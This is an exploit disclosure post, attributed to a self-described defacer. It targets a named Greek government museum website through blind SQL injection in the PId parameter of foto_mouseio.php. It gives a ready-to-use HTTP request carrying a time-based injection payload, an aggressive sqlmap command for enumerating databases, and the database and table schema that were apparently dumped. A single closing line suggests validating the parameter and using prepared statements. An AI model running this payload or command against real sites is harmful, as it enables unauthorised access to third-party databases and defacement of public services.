###################################################################
# Exploit Title : larmouseia.thessaly.gov.gr blind SQL injection vulnerability
# Author [ Discovered By ] : At0m - Turkish Defacer and Bug Researcher
# Tested On : Windows and Linux
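# file.txt (the saved HTTP request that the command below reads with -r; the injected value is in the PId query parameter) :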
GET /foto_mouseio.php?PId=(select(0)from(select(sleep(0)))v)/*'%2b(select(0)from(select(sleep(0)))v)%2b'%22%2b(select(0)from(select(sleep(0)))v)%2b%22*/ HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://larmouseia.thessaly.gov.gr/
Cookie: PHPSESSID=374941e7f62501d7ae853771458e0d2f
Host: larmouseia.thessaly.gov.gr
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
#command: python sqlmap.py -r file.txt --level=5 --risk=3 --tamper=space2comment --dbs --batch
# Contact / skype : at0munderground@gmail.com
Database: MouseiaLar
Table: Mouseio
[16 columns]
+------------+--------------+
| Column | Type |
+------------+--------------+
| HistoryEl | varchar(255) |
| HistoryEn | varchar(255) |
| IconEl | varchar(255) |
| IconEn | varchar(255) |
| InfoEl | text |
| InfoEn | text |
| LocEl | text |
| LocEn | text |
| MapEl | varchar(255) |
| MapEn | varchar(255) |
| Mouseio_Id | int(11) |
| NameEl | varchar(255) |
| NameEn | varchar(255) |
| OrderBy | tinyint(4) |
| PresEl | text |
| PresEn | text |
+------------+--------------+
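# Mitigation : foto_mouseio.php should validate PId as an integer and pass it to the query as a bound parameter (prepared statement) instead of building the SQL string from the request value.
###################################################################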